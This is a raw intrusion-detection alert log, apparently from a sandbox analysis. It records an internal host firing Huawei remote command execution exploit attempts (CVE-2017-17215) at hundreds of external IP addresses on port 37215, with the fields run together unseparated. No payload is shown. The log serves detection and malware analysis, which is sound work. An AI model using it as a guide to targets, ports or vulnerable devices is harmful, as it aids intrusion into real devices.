                                                    07/10/24-08:27:17.034414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4843037215192.168.2.1417.71.67.96
                                                    07/10/24-08:27:19.168887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5053437215192.168.2.14197.1.3.12
                                                    07/10/24-08:26:31.110182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4617837215192.168.2.14157.130.44.94
                                                    07/10/24-08:27:13.995409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6098037215192.168.2.1441.3.64.99
                                                    07/10/24-08:27:23.898408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080637215192.168.2.1441.126.207.156
                                                    07/10/24-08:27:16.994727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3678037215192.168.2.1441.203.10.172
                                                    07/10/24-08:26:34.201390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5815637215192.168.2.1441.137.82.198
                                                    07/10/24-08:27:02.702114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287237215192.168.2.14218.37.183.177
                                                    07/10/24-08:27:27.165580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5635237215192.168.2.14197.30.74.120
                                                    07/10/24-08:26:57.667245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6078837215192.168.2.14146.221.69.224
                                                    07/10/24-08:27:33.771362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5301237215192.168.2.14157.239.236.48
                                                    07/10/24-08:27:11.475374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883237215192.168.2.1441.191.155.127
                                                    07/10/24-08:27:19.312425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3871237215192.168.2.14197.198.81.70
                                                    07/10/24-08:27:02.876445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313837215192.168.2.14157.175.16.34
                                                    07/10/24-08:26:25.502645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5824037215192.168.2.14187.194.250.245
                                                    07/10/24-08:27:07.361237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3277637215192.168.2.14157.135.105.212
                                                    07/10/24-08:26:26.595344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3647037215192.168.2.1470.134.195.218
                                                    07/10/24-08:27:28.160478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4037237215192.168.2.1425.59.62.238
                                                    07/10/24-08:26:13.798574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5449037215192.168.2.14102.43.49.175
                                                    07/10/24-08:26:45.607531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5599437215192.168.2.14197.100.5.109
                                                    07/10/24-08:27:27.036328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952037215192.168.2.14157.73.104.147
                                                    07/10/24-08:27:19.228026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5165637215192.168.2.14197.161.174.117
                                                    07/10/24-08:26:13.644987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3818037215192.168.2.1496.57.127.24
                                                    07/10/24-08:26:55.330148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896237215192.168.2.14157.83.24.70
                                                    07/10/24-08:26:25.469425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798237215192.168.2.1441.76.40.197
                                                    07/10/24-08:26:55.413827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4482037215192.168.2.1483.135.8.130
                                                    07/10/24-08:26:28.845573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564837215192.168.2.1441.134.119.175
                                                    07/10/24-08:26:52.036040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911037215192.168.2.14132.73.219.183
                                                    07/10/24-08:27:24.891273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4248237215192.168.2.14157.93.239.140
                                                    07/10/24-08:26:43.922168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4019837215192.168.2.14186.85.164.255
                                                    07/10/24-08:26:59.797297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415637215192.168.2.14197.148.161.88
                                                    07/10/24-08:26:34.190814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5624437215192.168.2.1441.133.40.190
                                                    07/10/24-08:26:29.865951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349037215192.168.2.14128.173.254.30
                                                    07/10/24-08:27:27.107165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6070037215192.168.2.14197.79.249.78
                                                    07/10/24-08:26:28.845245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4765037215192.168.2.14205.214.167.99
                                                    07/10/24-08:26:15.854243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4466837215192.168.2.14219.23.22.221
                                                    07/10/24-08:27:33.743341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6099037215192.168.2.1441.191.56.188
                                                    07/10/24-08:27:17.079393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3738437215192.168.2.14157.137.72.21
                                                    07/10/24-08:26:20.172678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5988837215192.168.2.14197.157.208.16
                                                    07/10/24-08:26:33.156577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4320237215192.168.2.1441.47.161.67
                                                    07/10/24-08:26:43.872058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5712037215192.168.2.14197.242.189.107
                                                    07/10/24-08:27:11.612567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3807437215192.168.2.14146.202.215.132
                                                    07/10/24-08:27:22.476492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620837215192.168.2.1441.98.223.82
                                                    07/10/24-08:26:51.979399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5282437215192.168.2.14157.213.250.182
                                                    07/10/24-08:27:33.792052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844837215192.168.2.14197.135.34.143
                                                    07/10/24-08:27:32.538394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5126037215192.168.2.1441.189.50.154
                                                    07/10/24-08:27:22.932335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5310437215192.168.2.14105.185.48.232
                                                    07/10/24-08:26:38.598887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468837215192.168.2.14197.49.108.212
                                                    07/10/24-08:26:53.193808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3581237215192.168.2.14197.135.241.134
                                                    07/10/24-08:27:00.477553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3288437215192.168.2.14197.33.119.123
                                                    07/10/24-08:27:23.832820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3936437215192.168.2.14157.28.253.90
                                                    07/10/24-08:26:36.425072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550237215192.168.2.14197.141.250.153
                                                    07/10/24-08:26:43.695229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3650637215192.168.2.14157.253.38.77
                                                    07/10/24-08:26:41.630193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5206837215192.168.2.14158.237.151.45
                                                    07/10/24-08:26:59.707138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4529237215192.168.2.14197.8.100.43
                                                    07/10/24-08:26:23.305077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4319637215192.168.2.1441.16.21.171
                                                    07/10/24-08:26:36.422019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4181637215192.168.2.14157.23.78.198
                                                    07/10/24-08:26:31.060158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5545037215192.168.2.14197.74.204.31
                                                    07/10/24-08:26:57.669617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5969037215192.168.2.1441.88.79.199
                                                    07/10/24-08:26:23.328153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5528637215192.168.2.14148.153.194.202
                                                    07/10/24-08:27:11.574259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3833237215192.168.2.14197.67.35.3
                                                    07/10/24-08:27:20.523162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886237215192.168.2.14220.205.94.195
                                                    07/10/24-08:26:18.019292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686437215192.168.2.1441.174.17.39
                                                    07/10/24-08:26:52.027011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448637215192.168.2.14197.158.157.18
                                                    07/10/24-08:27:33.961510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5704637215192.168.2.1441.27.14.213
                                                    07/10/24-08:26:52.005706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4272637215192.168.2.14168.143.74.44
                                                    07/10/24-08:27:33.759873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5064037215192.168.2.1442.223.234.115
                                                    07/10/24-08:26:31.056183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5022837215192.168.2.1450.216.24.85
                                                    07/10/24-08:27:19.261102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4984437215192.168.2.1457.9.97.144
                                                    07/10/24-08:26:36.383866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3391037215192.168.2.14197.99.158.218
                                                    07/10/24-08:27:27.136421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4648637215192.168.2.14197.197.42.174
                                                    07/10/24-08:26:29.875602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4692637215192.168.2.14197.236.224.22
                                                    07/10/24-08:27:02.973887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706837215192.168.2.1497.100.10.138
                                                    07/10/24-08:26:34.245550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854637215192.168.2.1441.38.242.117
                                                    07/10/24-08:26:48.024550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615237215192.168.2.14157.169.65.236
                                                    07/10/24-08:26:45.623993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573637215192.168.2.1441.219.220.195
                                                    07/10/24-08:26:51.994120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4771437215192.168.2.14197.168.177.106
                                                    07/10/24-08:27:32.566152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4841637215192.168.2.14157.58.14.245
                                                    07/10/24-08:26:57.528715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4638237215192.168.2.14139.102.139.251
                                                    07/10/24-08:26:49.853206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266037215192.168.2.14157.6.104.92
                                                    07/10/24-08:26:18.017676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3490637215192.168.2.1440.4.65.2
                                                    07/10/24-08:26:25.492137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3592237215192.168.2.14197.125.99.45
                                                    07/10/24-08:27:22.915722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5828837215192.168.2.14157.180.71.190
                                                    07/10/24-08:26:33.252785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324437215192.168.2.1441.89.33.206
                                                    07/10/24-08:27:07.392939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4465237215192.168.2.1495.170.235.204
                                                    07/10/24-08:26:29.841336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5595437215192.168.2.14157.220.247.189
                                                    07/10/24-08:27:07.364210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3312437215192.168.2.14157.190.56.56
                                                    07/10/24-08:27:23.917570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5914437215192.168.2.14197.251.120.224
                                                    07/10/24-08:26:59.660546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4992837215192.168.2.144.60.183.33
                                                    07/10/24-08:26:57.650012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886237215192.168.2.1441.218.111.130
                                                    07/10/24-08:27:22.909297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3673037215192.168.2.1459.31.208.92
                                                    07/10/24-08:26:28.716778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4753837215192.168.2.14197.227.104.207
                                                    07/10/24-08:27:34.131322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985237215192.168.2.14197.40.211.135
                                                    07/10/24-08:26:14.755874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3834837215192.168.2.14157.192.152.92
                                                    07/10/24-08:26:38.546157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3872237215192.168.2.1441.112.114.74
                                                    07/10/24-08:27:20.428275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5062637215192.168.2.14157.91.135.150
                                                    07/10/24-08:26:29.849427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852237215192.168.2.14197.9.135.239
                                                    07/10/24-08:26:33.234829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5874637215192.168.2.14157.61.16.193
                                                    07/10/24-08:26:11.105153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6078437215192.168.2.14157.241.125.74
                                                    07/10/24-08:26:25.469425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4039237215192.168.2.14197.46.97.34
                                                    07/10/24-08:26:57.517659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172637215192.168.2.14157.90.66.161
                                                    07/10/24-08:26:15.881415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4509437215192.168.2.14197.59.119.49
                                                    07/10/24-08:27:03.019463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5883437215192.168.2.14197.61.164.74
                                                    07/10/24-08:27:19.259031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253637215192.168.2.1441.22.123.150
                                                    07/10/24-08:27:22.810322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3882837215192.168.2.14157.115.191.125
                                                    07/10/24-08:26:15.872780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644837215192.168.2.1441.92.31.187
                                                    07/10/24-08:27:23.773863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4952637215192.168.2.1441.198.5.253
                                                    07/10/24-08:26:59.575618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5820037215192.168.2.1441.139.170.89
                                                    07/10/24-08:27:07.329949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4997037215192.168.2.14197.243.221.23
                                                    07/10/24-08:27:19.327774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3871437215192.168.2.14146.150.108.146
                                                    07/10/24-08:26:29.860870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5014637215192.168.2.1441.203.214.148
                                                    07/10/24-08:26:53.186612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4435037215192.168.2.1479.206.97.24
                                                    07/10/24-08:26:52.070020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038637215192.168.2.14197.110.251.100
                                                    07/10/24-08:27:14.829677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5194037215192.168.2.1441.199.224.226
                                                    07/10/24-08:26:59.628167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3538437215192.168.2.14116.97.44.96
                                                    07/10/24-08:27:17.026223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3929237215192.168.2.14197.7.149.32
                                                    07/10/24-08:27:19.315486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4113237215192.168.2.1468.221.96.246
                                                    07/10/24-08:26:17.997409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5966437215192.168.2.145.202.215.170
                                                    07/10/24-08:26:20.134234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973637215192.168.2.14197.174.34.2
                                                    07/10/24-08:26:47.891770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4200037215192.168.2.14168.208.246.27
                                                    07/10/24-08:27:27.076919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5723437215192.168.2.14197.40.47.241
                                                    07/10/24-08:27:13.886782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098237215192.168.2.1441.43.34.74
                                                    07/10/24-08:27:22.761742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3918237215192.168.2.14157.132.251.100
                                                    07/10/24-08:27:07.390011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3330637215192.168.2.1414.209.47.246
                                                    07/10/24-08:27:08.448346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5136837215192.168.2.14192.27.240.157
                                                    07/10/24-08:26:25.428248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5066837215192.168.2.1441.215.146.158
                                                    07/10/24-08:26:41.556012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3670037215192.168.2.14157.206.40.45
                                                    07/10/24-08:26:47.746309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674437215192.168.2.1441.134.225.243
                                                    07/10/24-08:27:22.570409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593637215192.168.2.14157.179.64.138
                                                    07/10/24-08:26:15.792492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5987637215192.168.2.14157.244.150.48
                                                    07/10/24-08:26:18.037621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5542837215192.168.2.14157.207.230.253
                                                    07/10/24-08:27:17.014699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4977437215192.168.2.1481.133.111.161
                                                    07/10/24-08:27:11.564208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5083437215192.168.2.1441.142.172.62
                                                    07/10/24-08:26:31.062553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5805437215192.168.2.14157.85.50.82
                                                    07/10/24-08:26:14.824393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3941237215192.168.2.14197.112.60.5
                                                    07/10/24-08:26:15.795103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3598237215192.168.2.14157.163.125.144
                                                    07/10/24-08:27:02.784387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4887837215192.168.2.1488.71.120.40
                                                    07/10/24-08:26:36.420530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4620037215192.168.2.14197.43.31.56
                                                    07/10/24-08:27:22.781993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486637215192.168.2.14157.180.237.38
                                                    07/10/24-08:27:11.538749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3460037215192.168.2.1423.246.29.225
                                                    07/10/24-08:26:52.092342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862637215192.168.2.1441.211.117.232
                                                    07/10/24-08:26:33.173734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3995237215192.168.2.14157.129.185.82
                                                    07/10/24-08:26:36.358429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5924037215192.168.2.14157.160.226.234
                                                    07/10/24-08:26:23.337852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373437215192.168.2.14197.160.59.87
                                                    07/10/24-08:26:29.874680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5964637215192.168.2.14157.253.51.236
                                                    07/10/24-08:26:59.539411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304437215192.168.2.14146.63.146.126
                                                    07/10/24-08:27:02.836233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5006437215192.168.2.14157.195.133.242
                                                    07/10/24-08:27:13.955612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734237215192.168.2.1441.193.139.210
                                                    07/10/24-08:26:49.792004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219437215192.168.2.1441.43.217.197
                                                    07/10/24-08:26:25.486715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4760237215192.168.2.14197.0.82.158
                                                    07/10/24-08:26:13.850694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566437215192.168.2.1441.71.163.99
                                                    07/10/24-08:26:59.640605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3829637215192.168.2.14197.137.226.40
                                                    07/10/24-08:26:22.207243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4568837215192.168.2.14157.192.255.78
                                                    07/10/24-08:26:47.964630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5043837215192.168.2.14197.216.1.43
                                                    07/10/24-08:27:19.205775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4904837215192.168.2.1441.53.141.103
                                                    07/10/24-08:27:27.165580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5281837215192.168.2.14197.223.34.196
                                                    07/10/24-08:27:02.939930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4973037215192.168.2.1441.210.24.34
                                                    07/10/24-08:26:14.720259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732037215192.168.2.14197.193.192.133
                                                    07/10/24-08:26:14.771626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5194637215192.168.2.1441.96.189.227
                                                    07/10/24-08:26:57.641375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4888237215192.168.2.14157.44.47.169
                                                    07/10/24-08:26:28.782504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3278837215192.168.2.14157.79.242.144
                                                    07/10/24-08:27:02.736564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4417037215192.168.2.14157.60.28.52
                                                    07/10/24-08:26:55.421781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4490037215192.168.2.1441.180.96.107
                                                    07/10/24-08:26:57.669251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3309237215192.168.2.1476.205.171.247
                                                    07/10/24-08:27:22.799861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4320037215192.168.2.14157.59.115.163
                                                    07/10/24-08:26:17.989369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812037215192.168.2.14144.143.25.173
                                                    07/10/24-08:27:02.993548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4302637215192.168.2.1441.157.96.8
                                                    07/10/24-08:26:20.178441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4763637215192.168.2.1493.215.55.32
                                                    07/10/24-08:27:30.444782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3988637215192.168.2.1489.200.207.163
                                                    07/10/24-08:26:41.335427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4646637215192.168.2.141.39.91.217
                                                    07/10/24-08:27:11.534381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3341637215192.168.2.14197.61.125.135
                                                    07/10/24-08:26:52.004457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4230037215192.168.2.14158.159.218.138
                                                    07/10/24-08:27:08.417539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5477037215192.168.2.14197.8.4.186
                                                    07/10/24-08:26:43.613127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237637215192.168.2.14157.138.229.198
                                                    07/10/24-08:26:59.858149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5063637215192.168.2.1449.144.113.80
                                                    07/10/24-08:26:14.721683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4603237215192.168.2.14157.1.167.208
                                                    07/10/24-08:26:42.410235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5787437215192.168.2.1492.11.97.167
                                                    07/10/24-08:26:59.646425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4541437215192.168.2.14157.180.55.60
                                                    07/10/24-08:26:59.669841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3345837215192.168.2.1441.104.215.28
                                                    07/10/24-08:27:27.058852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385237215192.168.2.1441.10.168.178
                                                    07/10/24-08:27:30.511360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4018037215192.168.2.1441.100.231.173
                                                    07/10/24-08:26:53.202561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4782237215192.168.2.14157.3.246.224
                                                    07/10/24-08:27:02.706461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3757637215192.168.2.14197.198.56.212
                                                    07/10/24-08:26:11.596894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257037215192.168.2.1441.159.106.191
                                                    07/10/24-08:26:59.620881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819237215192.168.2.14197.143.71.227
                                                    07/10/24-08:26:28.927122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257837215192.168.2.1441.17.31.72
